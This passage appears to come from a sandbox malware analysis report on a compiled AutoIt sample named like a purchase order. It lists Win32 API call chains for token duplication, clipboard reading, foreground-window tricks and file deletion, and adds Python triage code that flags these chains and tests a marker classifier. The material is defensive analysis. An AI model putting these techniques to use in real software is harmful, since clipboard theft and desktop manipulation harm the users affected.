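    stub += (0x40).to_bytes(4, "little")          # e_lfanew -> 0x40
    stub += b"PE\x00\x00" + b"\x00" * 0x40        # bare NT signature + padding
    stub += b">>>AUTOIT SCRIPT<<<\x00"            # lands at offset 0x84
    stub += b"\x00" * 16
    stub += b"AU3!EA06" + b"\x00" * 8             # lands at offset 0xA8
    return bytes(stub)


def scan_file(path: str) -> str:
    """Classify a file on disk (not exercised by the constructed sample)."""
    with open(path, "rb") as fh:
        return classify(fh.read())


if __name__ == "__main__":
    sample = build_sample()
    print(classify(sample), find_autoit_markers(sample))
```

Run `scan_file()` against the submitted sample to confirm the verdict; the marker offsets tell you where the embedded script starts, which is the region to carve for decompilation rather than the AutoIt runtime code the function blocks above describe.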
                        APIs
                          • Part of subcall function 002EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002EBF0F
                          • Part of subcall function 002EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002EBF3C
                          • Part of subcall function 002EBEC3: GetLastError.KERNEL32 ref: 002EBF49
                        • _memset.LIBCMT ref: 002EBA34
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002EBA86
                        • CloseHandle.KERNEL32(?), ref: 002EBA97
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002EBAAE
                        • GetProcessWindowStation.USER32 ref: 002EBAC7
                        • SetProcessWindowStation.USER32(00000000), ref: 002EBAD1
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002EBAEB
                          • Part of subcall function 002EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002EB9EC), ref: 002EB8C5
                          • Part of subcall function 002EB8B0: CloseHandle.KERNEL32(?,?,002EB9EC), ref: 002EB8D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        • Opcode ID: bb4f8226a7da604aa18dca1c54014e8e015dbd769142509dbcf4a477f381edfc
                        • Instruction ID: e8a96279e1e64e42b194709b1f6caadd8a33b5a1979f9527ba46c299c065e94c
                        • Opcode Fuzzy Hash: bb4f8226a7da604aa18dca1c54014e8e015dbd769142509dbcf4a477f381edfc
                        • Instruction Fuzzy Hash: 22817071850289AFDF12DFA5DD85AEF7B78EF08304F54416AF914A6161DB318E24DF20
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7B9F: __wsplitpath.LIBCMT ref: 002F7BBC
                          • Part of subcall function 002F7B9F: __wsplitpath.LIBCMT ref: 002F7BCF
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • _wcscat.LIBCMT ref: 002F6B9D
                        • _wcscat.LIBCMT ref: 002F6BBB
                        • __wsplitpath.LIBCMT ref: 002F6BE2
                        • FindFirstFileW.KERNEL32(?,?), ref: 002F6BF8
                        • _wcscpy.LIBCMT ref: 002F6C57
                        • _wcscat.LIBCMT ref: 002F6C6A
                        • _wcscat.LIBCMT ref: 002F6C7D
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F6CAB
                        • DeleteFileW.KERNEL32(?), ref: 002F6CBC
                        • MoveFileW.KERNEL32(?,?), ref: 002F6CDB
                        • MoveFileW.KERNEL32(?,?), ref: 002F6CEA
                        • CopyFileW.KERNEL32(?,?,00000000), ref: 002F6CFF
                        • DeleteFileW.KERNEL32(?), ref: 002F6D10
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F6D37
                        • FindClose.KERNEL32(00000000), ref: 002F6D53
                        • FindClose.KERNEL32(00000000), ref: 002F6D61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                        • String ID: \*.*
                        • API String ID: 1867810238-1173974218
                        • Opcode ID: a338fa9ed88329cb582b1345cbafcb0b7a74ba578b663ea4a9f95af408f8e675
                        • Instruction ID: 72574f1cee43144e5c3c23175ad9c3ae9236ced6d464ca7954e73eab57e13939
                        • Opcode Fuzzy Hash: a338fa9ed88329cb582b1345cbafcb0b7a74ba578b663ea4a9f95af408f8e675
                        • Instruction Fuzzy Hash: FC51617291411CAACF21DBA0DC88EEEB77CAF09344F0445E6E649E3141EB359B98CF61
                        APIs
                        • OpenClipboard.USER32(0034DBF0), ref: 003070C3
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003070D1
                        • GetClipboardData.USER32(0000000D), ref: 003070D9
                        • CloseClipboard.USER32 ref: 003070E5
                        • GlobalLock.KERNEL32(00000000), ref: 00307101
                        • CloseClipboard.USER32 ref: 0030710B
                        • GlobalUnlock.KERNEL32(00000000), ref: 00307120
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0030712D
                        • GetClipboardData.USER32(00000001), ref: 00307135
                        • GlobalLock.KERNEL32(00000000), ref: 00307142
                        • GlobalUnlock.KERNEL32(00000000), ref: 00307176
                        • CloseClipboard.USER32 ref: 00307283
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        • Opcode ID: 3cc66a3a2fe05ea2c4ad79b9ea941313292ddc304bf6d20b4cdf7bad31b43823
                        • Instruction ID: 67c042a0ceaf919a65bcb0543ce3f4a2f1fc4b6ea481d709eca29574becb5455
                        • Opcode Fuzzy Hash: 3cc66a3a2fe05ea2c4ad79b9ea941313292ddc304bf6d20b4cdf7bad31b43823
                        • Instruction Fuzzy Hash: 9A51D171208201ABD312EF64ECA6FAF77ACAF84B40F010919F556D71D1DF70E8058B62
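Three of the function blocks above are recognisable Win32 call chains rather than generic runtime code: FindWindowW("Shell_TrayWnd") + AttachThreadInput + keybd_event(0x12, which is VK_MENU, the Alt key) + SetForegroundWindow is the force-foreground trick (a synthetic Alt press satisfies the SetForegroundWindow input restriction for the attached queue); DuplicateTokenEx + OpenWindowStationW("winsta0") + OpenDesktopW("default") duplicates a token onto the interactive desktop, consistent with AutoIt's RunAs implementation; OpenClipboard + GetClipboardData(0x0D = CF_UNICODETEXT, 0x01 = CF_TEXT) reads the clipboard. The Python below is an added triage example, not Joe Sandbox code: it parses the report's "APIs" lines and flags those three chains. Its inputs are trimmed excerpts copied from the blocks above; the rule names are mine, and the VK_MENU and CF_* values are the Win32 header constants.

```python
"""Parse the 'APIs' lines of Joe Sandbox function blocks and flag known
Win32 call chains. Added triage example for this report; not Joe Sandbox
code. Input lines are trimmed excerpts copied from the blocks above; rule
names are mine; VK_MENU and CF_* are the Win32 header constants."""
import re
from dataclasses import dataclass

# One report line: optional "Part of subcall function XXXX: " prefix, then
# Api.MODULE(args), ref: ADDR   (args and parentheses may be absent).
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)"
)

VK_MENU = 0x12                       # Alt key
CF_TEXT, CF_UNICODETEXT = 0x01, 0x0D
CF_NAMES = {CF_TEXT: "CF_TEXT", CF_UNICODETEXT: "CF_UNICODETEXT"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: bool


def parse_calls(text: str) -> list:
    """Turn report lines into Call records; headers and unparsable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


def hex_arg(call: Call, idx: int):
    """Argument idx as an int, or None when it is '?', a string, or missing."""
    try:
        return int(call.args[idx], 16)
    except (IndexError, ValueError):
        return None


def match_rules(calls: list) -> list:
    """Apply three chain rules drawn from the blocks above."""
    apis = {c.api for c in calls}
    findings = []
    # 1. Force-foreground: a synthetic Alt press lifts the SetForegroundWindow
    #    restriction for the attached input queue.
    alt = [c for c in calls if c.api == "keybd_event" and hex_arg(c, 0) == VK_MENU]
    if alt and {"AttachThreadInput", "SetForegroundWindow"} <= apis:
        findings.append("force-foreground: AttachThreadInput + keybd_event(VK_MENU) + SetForegroundWindow")
    # 2. Clipboard read, reporting which formats are pulled.
    fmts = {hex_arg(c, 0) for c in calls if c.api == "GetClipboardData"}
    fmts.discard(None)
    if "OpenClipboard" in apis and fmts:
        names = [CF_NAMES.get(f, hex(f)) for f in sorted(fmts)]
        findings.append("clipboard-read: " + ", ".join(names))
    # 3. Token duplication onto the interactive window station / desktop.
    if {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"} <= apis:
        findings.append("token-to-interactive-desktop: DuplicateTokenEx + OpenWindowStationW + OpenDesktopW")
    return findings


# Trimmed excerpts of the report's own lines.
FOREGROUND = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00324388
• SetForegroundWindow.USER32(000000FF), ref: 003243A8
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003243E2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0032440A
• keybd_event.USER32(00000012,00000000), ref: 00324415
• SetForegroundWindow.USER32(000000FF), ref: 00324444
"""
TOKEN = """
  • Part of subcall function 002EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002EBF3C
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002EBA86
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002EBAAE
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002EBAEB
"""
CLIPBOARD = """
• OpenClipboard.USER32(0034DBF0), ref: 003070C3
• IsClipboardFormatAvailable.USER32(0000000D), ref: 003070D1
• GetClipboardData.USER32(0000000D), ref: 003070D9
• GetClipboardData.USER32(00000001), ref: 00307135
• CloseClipboard.USER32 ref: 00307283
"""

if __name__ == "__main__":
    for name, block in (("foreground", FOREGROUND), ("token", TOKEN), ("clipboard", CLIPBOARD)):
        print(name, match_rules(parse_calls(block)))
```

Feed it the full "APIs" sections of a report export and the rule hits tell you which functions deserve a look in the disassembly; the `subcall` flag preserves the report's distinction between a direct call and one made by a callee, so a rule can be tightened to direct calls only if the indirect ones prove noisy. Note that these chains are part of the AutoIt runtime that every compiled script ships with, so a hit means the capability is present, not that the script exercises it.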
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 002FFE03
                        • FindClose.KERNEL32(00000000), ref: 002FFE57
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FFE7C
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FFE93
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002FFEBA
                        • __swprintf.LIBCMT ref: 002FFF06
                        • __swprintf.LIBCMT ref: 002FFF3F
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • __swprintf.LIBCMT ref: 002FFF93
                          • Part of subcall function 002D234B: __woutput_l.LIBCMT ref: 002D23A4
                        • __swprintf.LIBCMT ref: 002FFFE1
                        • __swprintf.LIBCMT ref: 00300030
                        • __swprintf.LIBCMT ref: 0030007F
                        • __swprintf.LIBCMT ref: 003000CE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 108614129-2428617273
                        • Opcode ID: bd7e9a86541cc904bdaab3d03a2bcb65d1a5b66920404fc9181347293995f8bb
                        • Instruction ID: 9b26ccbba08f9bf8c5f371149c0a0d8949f372e20c7d072b193d56ba2f60acd7
                        • Opcode Fuzzy Hash: bd7e9a86541cc904bdaab3d03a2bcb65d1a5b66920404fc9181347293995f8bb
                        • Instruction Fuzzy Hash: 34A152B1428344ABC355EFA4CC81EAFB7ECAF94740F44095DF585C6191EB34EA19CB62
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00302065
                        • _wcscmp.LIBCMT ref: 0030207A
                        • _wcscmp.LIBCMT ref: 00302091
                        • GetFileAttributesW.KERNEL32(?), ref: 003020A3
                        • SetFileAttributesW.KERNEL32(?,?), ref: 003020BD
                        • FindNextFileW.KERNEL32(00000000,?), ref: 003020D5
                        • FindClose.KERNEL32(00000000), ref: 003020E0
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003020FC
                        • _wcscmp.LIBCMT ref: 00302123
                        • _wcscmp.LIBCMT ref: 0030213A
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0030214C
                        • SetCurrentDirectoryW.KERNEL32(00363A68), ref: 0030216A
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00302174
                        • FindClose.KERNEL32(00000000), ref: 00302181
                        • FindClose.KERNEL32(00000000), ref: 00302191
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        • Opcode ID: 7e3ec5526a09ad877518a7d2ce37f42972878176180db27e189b16e5054a915e
                        • Instruction ID: 535690b33460687518bb4a8e558c1f96830f3ee72e9f9e00381cde3115eaac0d
                        • Opcode Fuzzy Hash: 7e3ec5526a09ad877518a7d2ce37f42972878176180db27e189b16e5054a915e
                        • Instruction Fuzzy Hash: C1319031A02219ABDB26ABB4EC9CADF77AC9F06360F104166F911E21D0DB74DE54CB60
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003021C0
                        • _wcscmp.LIBCMT ref: 003021D5
                        • _wcscmp.LIBCMT ref: 003021EC
                          • Part of subcall function 002F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002F7621
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0030221B
                        • FindClose.KERNEL32(00000000), ref: 00302226
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00302242
                        • _wcscmp.LIBCMT ref: 00302269
                        • _wcscmp.LIBCMT ref: 00302280
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00302292
                        • SetCurrentDirectoryW.KERNEL32(00363A68), ref: 003022B0
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003022BA
                        • FindClose.KERNEL32(00000000), ref: 003022C7
                        • FindClose.KERNEL32(00000000), ref: 003022D7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        • Opcode ID: 54b7efb77bd1bedf65f9d11e312fad7985cc93df5ec24482f0e5073851c16d54
                        • Instruction ID: f68966675ad9319b4c388cad1383ff30cdbcccc45a666ba2db64022570e84430
                        • Opcode Fuzzy Hash: 54b7efb77bd1bedf65f9d11e312fad7985cc93df5ec24482f0e5073851c16d54
                        • Instruction Fuzzy Hash: D631C131902219AACF66EBE4EC5CEDE77AC9F15320F214651F810A21D0DB70DF95DB64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove_memset
                        • String ID: Q\E$[$\$\$\$]$^
                        • API String ID: 3555123492-286096704
                        • Opcode ID: 8b644a53c5cf6d9d3817d05c0cef0e722d61eb63da46a2985a04f9326e59c74e
                        • Instruction ID: 3392d11ee3994b73e55c0490601ce7dc72536bfb695cc4b98143aaa0d22aee93
                        • Opcode Fuzzy Hash: 8b644a53c5cf6d9d3817d05c0cef0e722d61eb63da46a2985a04f9326e59c74e
                        • Instruction Fuzzy Hash: 0472CF71D2421ACBCF29CF98C8946EDBBB1FF44354F2581A9D855AB381D374AE90DB40
                        APIs
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                          • Part of subcall function 002EB8E7: GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                          • Part of subcall function 002EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                          • Part of subcall function 002EB8E7: HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
                          • Part of subcall function 002EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                          • Part of subcall function 002EB982: GetProcessHeap.KERNEL32(00000008,002EB3E1,00000000,00000000,?,002EB3E1,?), ref: 002EB98E
                          • Part of subcall function 002EB982: HeapAlloc.KERNEL32(00000000,?,002EB3E1,?), ref: 002EB995
                          • Part of subcall function 002EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002EB3E1,?), ref: 002EB9A6
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002EB3FC
                        • _memset.LIBCMT ref: 002EB411
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002EB430
                        • GetLengthSid.ADVAPI32(?), ref: 002EB441
                        • GetAce.ADVAPI32(?,00000000,?), ref: 002EB47E
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002EB49A
                        • GetLengthSid.ADVAPI32(?), ref: 002EB4B7
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002EB4C6
                        • HeapAlloc.KERNEL32(00000000), ref: 002EB4CD
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002EB4EE
                        • CopySid.ADVAPI32(00000000), ref: 002EB4F5
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002EB526
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002EB54C
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002EB560
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: f008dd559f5779e79c2ba4727306ea0b6246e8490a88fdcf2610aaed98f96bda
                        • Instruction ID: c08aca40ad18595a915841fce48919ba9279e8a9ffb46b92469c240636c27c7b
                        • Opcode Fuzzy Hash: f008dd559f5779e79c2ba4727306ea0b6246e8490a88fdcf2610aaed98f96bda
                        • Instruction Fuzzy Hash: EA516B7195024AABDF06DFA2DC85AEFBB79FF04700F448129F915A72A1DB309A15CF60
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • _wcscat.LIBCMT ref: 002F6E7E
                        • __wsplitpath.LIBCMT ref: 002F6E99
                        • FindFirstFileW.KERNEL32(?,?), ref: 002F6EAE
                        • _wcscpy.LIBCMT ref: 002F6EDD
                        • _wcscat.LIBCMT ref: 002F6EEF
                        • _wcscat.LIBCMT ref: 002F6F01
                        • DeleteFileW.KERNEL32(?), ref: 002F6F0E
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F6F22
                        • FindClose.KERNEL32(00000000), ref: 002F6F3D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                        • String ID: \*.*
                        • API String ID: 2643075503-1173974218
                        • Opcode ID: e5f4394addf4ea584c84f5daad6459cc7c27f6f6ad24dd1f0ac7226b342a2415
                        • Instruction ID: 911620133eabf462e3b9be48476f42981c489fa14c76fc50e661ba7adc759e68
                        • Opcode Fuzzy Hash: e5f4394addf4ea584c84f5daad6459cc7c27f6f6ad24dd1f0ac7226b342a2415
                        • Instruction Fuzzy Hash: 9721E572418349AAC311EFA4D8899EBB7DC9F59354F044E2AF5D4C3142EA30D66C8B62
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                        • API String ID: 0-2893523900
                        • Opcode ID: 3a1d17d27f106eb237b6dd3f045270a96d3f141be85f50fbc2592d6e76cfc8bc
                        • Instruction ID: 294d56097cc4cfca14711a7b55794716d79fd8537ffbbafcc8819bab90b62b10
                        • Opcode Fuzzy Hash: 3a1d17d27f106eb237b6dd3f045270a96d3f141be85f50fbc2592d6e76cfc8bc
                        • Instruction Fuzzy Hash: BF62A1B1E202199BDF25CF99C8807EEB7B5BF48350F15816AE845EB281D7749E90CF90
                        APIs
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0031317F
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0031321E
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003132B6
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003134F5
                        • RegCloseKey.ADVAPI32(00000000), ref: 00313502
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
